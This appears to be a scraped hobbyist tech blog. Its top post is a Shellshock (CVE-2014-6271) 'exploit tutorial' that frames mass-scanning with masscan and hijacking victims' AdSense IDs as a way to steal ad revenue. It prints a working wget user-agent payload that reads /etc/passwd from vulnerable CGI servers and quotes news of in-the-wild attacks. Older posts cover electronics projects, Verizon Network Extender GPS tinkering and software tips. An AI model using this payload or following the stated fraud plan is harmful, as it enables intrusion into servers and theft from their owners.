How to exploit and use the Bash ShellShock Bug in Mac OSX and Ubuntu Linux, Step by Step Tutorial

September 25, 2014

It's useful to know


In our example we will execute a simple script on the victim to change a victims Google AdSense Account ID to your ID so you can take his ad revenue.  Each victim seems to only average around $3-5 a day but you can quickly exploit several thousand victims which really adds up…  Time is of the essence however as more and more people patch there servers…

Step 1:

Find a victim, this is very easy with the proper tools.. In our example we will be using masscan

Go ahead and download the latest version from

***This tutorial assumes you know basic terminal usage and are running either Linux or Max OSX and have a build environment setup..

After extracting the archive open /src/proto-http.c with a text editor and insert the following code at line #24

Update: 25/09/14 ***Removed from site after complaints… Leave a comment if you want the link to the instructions 


The problem as I understand it is that while it’s okay to define a function in an environment variable, bash is not supposed to execute the code after it.

The extra “Content-type:” is only for illustration. It prevents the 500 error and shows the contents of the file.

The above example also shows how it’s not a problem of programming errors, even normally safe and harmless bash cgi which doesn’t even take user input can be exploited.


Within a day of the Bash bug dubbed ‘shellshock’ being disclosed, it appears that attackers are already looking for ways to use it for their advantage.

Security researchers have found proof of concept code that attempts to exploit the serious bug discovered this week in Bourne-Again Shell, also known as Bash, which according to US CERT affects both Linux and Mac OS X.

The good news yesterday that some Linux distributions shipped patches for the bug yesterday has already been tempered by the discovery that those patches only partially dealt with potential attacks. In an update overnight, Red Hat said that it was developing a new patch, however, it is still advising users to apply the incomplete one for now.

At the same time as security experts have been racing to develop fixes for the bug and patch systems, it appears hackers have been working on tools to attack vulnerable systems.

Security researcher Yinette yesterday reported discovering the first attack in the wild that exploits the bug, which has been officially documented as CVE-2014-6271.

Security researchers have since analysed the malware, finding numerous functions including distributed denial of service (DDoS) IRC bot as well as a feature that attempts to guess passwords and logins on vulnerable servers, using a list of poor passwords such as ‘root’, ‘admin’, ‘user’, ‘login’, and ‘123456’.

AusCERT earlier yesterday also claimed to have received reports the bug was being exploited in the wild.

Meanwhile, security researcher Robert Graham claims to have found at least 3,000 systems vulnerable to the bug. However Graham’s scan only looked at systems on port 80; the researcher noted embedded webservers on odd ports are the real danger and a scan for these “would give a couple times more results”.

He also warned that DHCP services are also vulnerable, as reported in the initial advisory. “Consequently, even though my light scan found only 3,000 results, this thing is clearly wormable, and can easily worm past firewalls and infect lots of systems. One key question is whether Mac OS X and iPhone DHCP service is vulnerable — once the worm gets behind a firewall and runs a hostile DHCP server, that would “game over” for large networks.”




A very simple example would be a cgi, /var/www/cgi-bin/test.cgi:

echo "Content-type: text/plain"
echo "Hi"

Then call it with wget to swap out the User Agent string. E.g. this will show the contents of /etc/passwd:

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd"

To break it down:

"() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd"

Looks like:

() {
echo \"Content-type: text/plain\"
/bin/cat /etc/passwd

Micro Hydro Electronic Load Controller Scada

March 31, 2014

Hey guys!  Sorry I haven’t posted in awhile… Been busy working on this low power internet enabled Monitor and Control board..

Right now It’s got 8X 24 bit Analog Inputs that sample at up to 16ksps each and 8X high current DC outputs to control loads.

It makes for a very affordable Class 0.1 3 polyphase energy meter / monitor with snmp support to poll all the power vectors… Reactive Power, Real Power, Power Factor, Frequency, Voltage, etc…   It also supports DC inputs such voltage and current for off grid solar systems..

It’s fully compatible with the cacti, zabbix and emoncms which each provide flexible web based logging and visualization of data gathered from the board.

Anyways.. Guess we’ll see how it goes!

Micro Hydro Electronic Load Controller Diagram


Oscilloscope Phase View showing waveform from current transformer attached to Power Factor Correction Capacitors… The onboard webserver also provides an oscilloscope

Android app oscilloscope view


PCB Board and Current Transformers

Cellular, Radio, and Hacking

April 19, 2012

A number of you have commented on my hacking the Verizon Network Extender page, so I wanted to just give you a bit of an update. Several months we discovered that the “HDMI” port on the bottom allowed for serial access to the Linux OS. One of our guys was able to gain Root access to the device.  So I’m sure it’s possible to do all the hacking from a totally software aspect, I didn’t really see a huge future in this device so I haven’t done further hacking on it. But it remains open for anyone who wants a challenge.

After my hacking on the VNE, I realized that OpenBTS might have some future. But after working for over two years to get licensing for testing, I realized that spectrum was the real problem, not hardware.

Now being involved with Ham radio, all the spectrum they have to use came to mind, why couldn’t that be used? I realized that there were plenty of software hackers out there, but not that many hardware hackers that would go out and make a radio, so I decided that would be the best use of my effort. I started work on this new radio in late 2011, and just now have the first prototypes put together. I have a website up for this new radio www. The basic idea is a digital radio that will work on Ham radio frequencies, allowing for messaging, full-duplex voice, and location services.  Share your thoughts in the comment section below.

Home made pulse induction metal detector

April 5, 2011

Hi Guys!

With all the hype about gold lately, thanks somewhat to Discovery recient showing of “Gold Rush Alaska”,

I’ve opened up a new website all about making yourself a metal detector!

I Just started it yesterday evening so it’s still in development at this point,but I hope you guys enjoy it.

I’ll get pictures up and more info as time provides.

Frustrations with software these days(Part 1)

September 26, 2010

Ok, myabe I shouldn’t be putting this up here, but I am!
So here we go! Over the last year or so, software makers(Skype, Google, Etc.) have been trying to stay with what, I call the Vista trend. Also known as bloat-ware, it’s when some thing that should be 5 MBs becomes 50 or even a 100 MBs! Then BOOM all of a sudden one by one, the new versions where showing up around 500KB, had there been some kind of a revolution? I hate to say this but, it was quite the opposite! It was an advanced effort to hide the fact that it was no longer 50MBs, but a 100(Or maybe allot more, no one really knows!) As for my little rant, well I’ve just been doing his in the time it took Google Earth to Download(On high speed). 🙂 BTW I feel sorry for any one on dial up, you remember what that is, Right? You know phone lines and all! LOL Well those people get less of the Internet then I did, when I had it! 🙂 Oh, did you want the easy fix(without having all of them rewrite the code) Here you will find all kinds of software, but old versions(they aren’t so bad)!

Office 2007 upgrade on windows 7?

May 18, 2010

Well allot of what I do is tech support for my clients, and just today I ran in to a problem that google couldn’t solve!

So I thought that I’d post the solution to the problem so it might be a benefit to you!


Some new dell windows 7 PCs

Office XP

and a upgrade to Office 2007


Office 2007 on windows 7


Office XP won’t install on windows 7.

The upgrade requires a previous version to work.

So here’s the most important part, the solution!

I called Microsoft up, the Indian guy that answered the phone was pretty helpful compared to most big companies.

He said that he could help me if I had a Microsoft copy(which I did) He then proceeded in emailing me a link to download the whole thing! YEA!!!!

For you convenience I’ve posted it here

Hope that this helps some of you!

Let me know if you have any issues!

Please note that you must own a valid copy of Microsoft 2007 upgrade before this will work.

Apple earphones bad?

March 30, 2010

The other day I had a pair of apple earphones that I was about ready to trash! I had tried everything!

Nothing seemed to work, that was until I tried lightly blowing and sucking in the earbud! YEA, right where you listen to music or what ever!

And it fixed it like magic!

Try it for your self!

Hacking the Verizon Network Extender – Part 2

March 28, 2010

So here it comes!

The latest news!

So where I left off in part one we still needed to get back down to the US for more testing, this post will be talking about that a bit.

With Verizon Network Extender back at it’s home it was ready to give some service!

On the above photo you will notice a few LEDs these are the status LEDs.

The power LED is blue if  the device has power.

The system LED is the status of whether this device is connected to verizon’s network.(BTW it has to be blue for the device to work)

The GPS LED, this LED is blue if it has a good signal from the device. If not it is Red.

And last there is the LAN LED that shows network activity etc.

Trip 1

On trip one we recorded the serial signals coming from the Network Extender(Photo Below)

At this point the code for the AVR wasn’t finished.

This turned out to be kind of a bother because we couldn’t test it using the AVR to replace the signals coming from the gps and test it in the US at the same time.

Back in Canada

My brother got the code finished up and the output looking the same as the US Signals.

But there was a problem!

The GPS LED would turn a NICE blue, But the system LED stayed a BAD red!

Trip 2

Back in the US we decided to test the system just like we had it in canada, But no go!

Had verizon blocked us? Thankfully Not!

At this point we discovered something very interesting!

The time that our test phone showed was the same as the time that we recorded the signal!

Kinda strange to see the phone showing 4pm when it was 9pm!

But if that system LED was red there was no dialing out! NONE! LOL

If we bridged the GPS back to normal it all worked! Strange!

Where to go next

We think that part of the System check includes, checking the time that’s coming from the GPS and comparing it too their server time.

Also we are checking the second I/O port on the GPS for use.

We are also looking into setting up a US proxy.

Hack the whole thing?

Here’s a photo of the Network Extender’s I/O Port.

Maybe one of you reading this would like to do this! I think that it would be so cool to hack it to a point that you could use asterisk for switching!

Hope to have another update soon, keep checking back!

Asterisk and Notepad++

March 27, 2010

Ever looked for a text editor that would highlight asterisk dialplan?

Now you have it!

Using Notepad++ and a custom language.

You can download it below


How to use:

Locate where your userDefineLang.xml is

Dependent on your installation configuration, it’s either in \Documents and Settings{your profile name}\Application Data\Notepad++\userDefineLang.xml or Notepad++ installation folder\userDefineLang.xml

Put the file there, and you are good to go!

If any one finds a problem please let me know!

CC/CV Single cell Lipo / Li-ion DIY Charger

March 18, 2010

Thought that you all might want to see this! A charger I built to replace a cheap one I bought from china…
It uses magnets to connect to the battery terminals and supports constant current/constant voltage and will trickle charge if the voltage is below like 1.6 volts…. The current is set via an external resistor! For the charger I built below I used a 1.3k resistor! which provided about 769ma’s of charging current during the constant current phase….The charge also cuts off at 1/10 of the charge rate after the Constant Voltage Phase!

The Charger is built around the TOREX Semiconductor’s XC6802 Single Chip Lion / Lipo charger IC.
Be sure to order it in the SOT-89 Package which is the largest they have, Still really small 🙂
Digikey Stocks the unit and has the best price!

If you want more details just leave a comment!

Cheap CC/CV Diy Lipo/Lion Charger Circut Diagram

Ic on board

Lipo/Li-ion Charger

Lipo/Lion Charger

Above is pictures of the charger before I potted it in a heat sink to help with heat and after I potted it in a heat sink! It looks really nice! And works equally well! The Orange LED indicates the charge status.
The LED is on when the battery is charging.

Below is a pic of a charger that I ordered from DealExtreme…A typical el-cheap’e-do lion charger!
It only dose Constant Current, No Constant Voltage phase and has no trickle charge start if the voltage is nominal…. In addition to that it charges the batteries to 4.32 volts!!!! And dose not cut-off after charge is complete! Basicly, It destroys your batteries and at the same time posing a risk to your house and belongings, And life itself!